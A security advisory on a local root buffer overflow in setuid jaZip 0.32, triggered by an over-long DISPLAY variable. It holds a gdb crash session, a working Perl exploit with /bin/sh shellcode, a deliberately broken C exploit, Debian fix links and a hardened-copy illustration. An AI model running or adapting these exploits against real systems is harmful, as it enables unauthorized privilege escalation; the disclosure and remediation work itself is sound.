COMMAND
jaZip
SYSTEMS AFFECTED
jaZip
PROBLEM
teleh0r found the following. jaZip is a program for managing an
Iomega Zip or Jaz drive. It is often installed setuid root, and
because of a buffer overflow (triggered here through an over-long
DISPLAY environment variable) it is possible for regular users to
become root.
Tested rpm:
ftp://ftp.linux.com/pub/mirrors/turbolinux/turbolinux/TurboLinux/RPMS/jaZip-0.32-2.i386.rpm
Let's see:
[root@localhost /root]# export DISPLAY=`perl -e '{print "A"x"2100"}'`
[root@localhost /root]# gdb /usr/X11R6/bin/jazip
GNU gdb 19991004
Copyright 1998 Free Software Foundation, Inc.
(gdb) r
Starting program: /usr/X11R6/bin/jazip
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
----
[teleh0r@localhost teleh0r]$ rpm -q jaZip
jaZip-0.32-2
[teleh0r@localhost teleh0r]$ ./jazip-exploit.pl
Address: 0xbffff7ac
bash#
Exploit follows:
#!/usr/bin/perl
## jaZip Exploit / Tested version: jaZip-0.32-2 / anno 2000
## teleh0r@doglover.com / http://teleh0r.cjb.net/

$shellcode = # Shellcode by: Taeho Oh
    "\xeb\x1f".                 #/* jmp 0x1f */
    "\x5e".                     #/* popl %esi */
    "\x89\x76\x08".             #/* movl %esi,0x8(%esi) */
    "\x31\xc0".                 #/* xorl %eax,%eax */
    "\x88\x46\x07".             #/* movb %eax,0x7(%esi) */
    "\x89\x46\x0c".             #/* movl %eax,0xc(%esi) */
    "\xb0\x0b".                 #/* movb $0xb,%al */
    "\x89\xf3".                 #/* movl %esi,%ebx */
    "\x8d\x4e\x08".             #/* leal 0x8(%esi),%ecx */
    "\x8d\x56\x0c".             #/* leal 0xc(%esi),%edx */
    "\xcd\x80".                 #/* int $0x80 */
    "\x31\xdb".                 #/* xorl %ebx,%ebx */
    "\x89\xd8".                 #/* movl %ebx,%eax */
    "\x40".                     #/* inc %eax */
    "\xcd\x80".                 #/* int $0x80 */
    "\xe8\xdc\xff\xff\xff".     #/* call -0x24 */
    "/bin/sh";                  #/* .string \"/bin/sh\" */

$ret = 0xbffff7ac; # May have to be modified.
$len = 2100;
$nop = 'A';

if (@ARGV == 1) {
    $offset = $ARGV[0];
}

for ($i = 0; $i < ($len - length($shellcode) - 100); $i++) {
    $buffer .= $nop;
}
$buffer .= $shellcode;

print("Address: 0x", sprintf('%lx',($ret + $offset)), "\n");
$new_ret = pack('l',($ret + $offset));

$buffer .= $nop x 3; # May have to be modified.
for ($i += length($shellcode); $i < $len; $i += 4) {
    $buffer .= $new_ret;
}

if ($ENV{'DISPLAY'}) {
    delete($ENV{'DISPLAY'});
}
local($ENV{'DISPLAY'}) = $buffer;
exec("/usr/X11R6/bin/jazip");
Here is another exploit:
/*
 * jaZip-0.32 local buffer overflow exploit (tested on debian)
 *
 * usage is: ./jazip-exp <offset> <align>
 * offset: 1500 x N (where N is positive or negative number)
 * align: 1-3 (0 is def.)
 *
 * This exploit is heavily broken, to prevent scriptkiddie abuse!
 * Thanks to d-blood for helping me with the shellcode.
 *
 * c0ded by: needler @ efnet <n33dl3r@hotmail.com>
 *
 * Oh btw.. fuck college, I'm gonna be a pro CS player.
 */

#include <stdio.h>
#include <stdlib.h>

#define BSIZE 2080
#define NOPS 1500

char shellcode[] =
    "\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d"
    "\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58";

int
main(int argc, char **argv, char **envp) {
    char overflow[BSIZE];
    int i, align = 0, offset = 0;
    u_long addy = 0xbffff9e5;

    if( argc > 1) offset = atoi(argv[1]);
    if( argc > 2) align = atoi(argv[2]);

    memset(overflow, 0x90, BSIZE);
    memcpy(&overflow[NOPS], shellcode, strlen(shellcode));
    memcpy(overflow, "DISPLAY=", 8);

    for( i = (NOPS + strlen(shellcode)); i < BSIZE; i += 4)
        *(long *)&overflow[i+align] = addy + offset;

    envp[0] = overflow;
    printf("Using address 0x%x\n", addy + offset);
    // execl("/usr/X11R6/bin/jazip", "jazip", NULL);
}
SOLUTION
For Debian Linux:
http://security.debian.org/dists/stable/updates/main/source/jazip_0.33-1.dsc
http://security.debian.org/dists/stable/updates/main/source/jazip_0.33-1.diff.gz
http://security.debian.org/dists/stable/updates/main/source/jazip_0.33.orig.tar.gz
http://security.debian.org/dists/stable/updates/main/binary-i386/jazip_0.33-1_i386.deb
http://security.debian.org/dists/stable/updates/main/binary-m68k/jazip_0.33-1_m68k.deb
http://security.debian.org/dists/stable/updates/main/binary-sparc/jazip_0.33-1_sparc.deb
http://security.debian.org/dists/stable/updates/main/binary-alpha/jazip_0.33-1_alpha.deb
http://security.debian.org/dists/stable/updates/main/binary-powerpc/jazip_0.33-1_powerpc.deb
The package author provided a fixed version, 0.33.
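The bug class behind this advisory is a setuid program copying the attacker-controlled DISPLAY variable into a fixed stack buffer without a length check. The following is an added illustration, not jaZip's source or the 0.33 patch: a constructed unsafe copy next to a bounded, validated one, with DISPLAY_MAX as an assumed cap and the 2100-byte input built inline to mirror the session above.

```c
/* Constructed illustration (not jaZip's code): reading DISPLAY in a setuid
 * program. DISPLAY_MAX is an assumed cap; real display names such as ":0.0"
 * or "host:10.0" are far shorter than the 2100 bytes used in the advisory. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>

#define DISPLAY_MAX 64

/* The bug pattern: unbounded copy of environment data into a fixed buffer.
 * Shown for contrast only; never called on long input here. */
void display_copy_unsafe(const char *display, char out[DISPLAY_MAX]) {
    strcpy(out, display);          /* no length check: 2100 bytes smash the stack */
}

/* Hardened form: bound the copy, reject empty or over-long values, and
 * accept only characters that occur in an X display name.
 * Returns 0 on success, -1 when the value is rejected. */
int display_copy_safe(const char *display, char *out, size_t outlen) {
    size_t n;
    if (display == NULL || out == NULL || outlen == 0) return -1;
    for (n = 0; n < outlen && display[n] != '\0'; n++) {
        unsigned char c = (unsigned char)display[n];
        if (!isalnum(c) && c != ':' && c != '.' && c != '-' && c != '_')
            return -1;
    }
    if (n == 0 || n >= outlen) return -1;   /* empty, or no room for the NUL */
    memcpy(out, display, n + 1);
    return 0;
}

/* What a setuid program would call instead of strcpy(buf, getenv("DISPLAY")). */
int read_display(char *out, size_t outlen) {
    return display_copy_safe(getenv("DISPLAY"), out, outlen);
}

int main(void) {
    char buf[DISPLAY_MAX];
    char big[2101];                          /* constructed: the advisory's 2100 x "A" */
    memset(big, 'A', 2100);
    big[2100] = '\0';
    printf("\":0.0\"     -> %d\n", display_copy_safe(":0.0", buf, sizeof buf)); /* 0 */
    printf("2100 x \"A\" -> %d\n", display_copy_safe(big, buf, sizeof buf));   /* -1 */
    return 0;
}
```

The hardened routine fails closed on the oversized value, so the process exits or falls back instead of jumping to 0x41414141 as in the gdb session above.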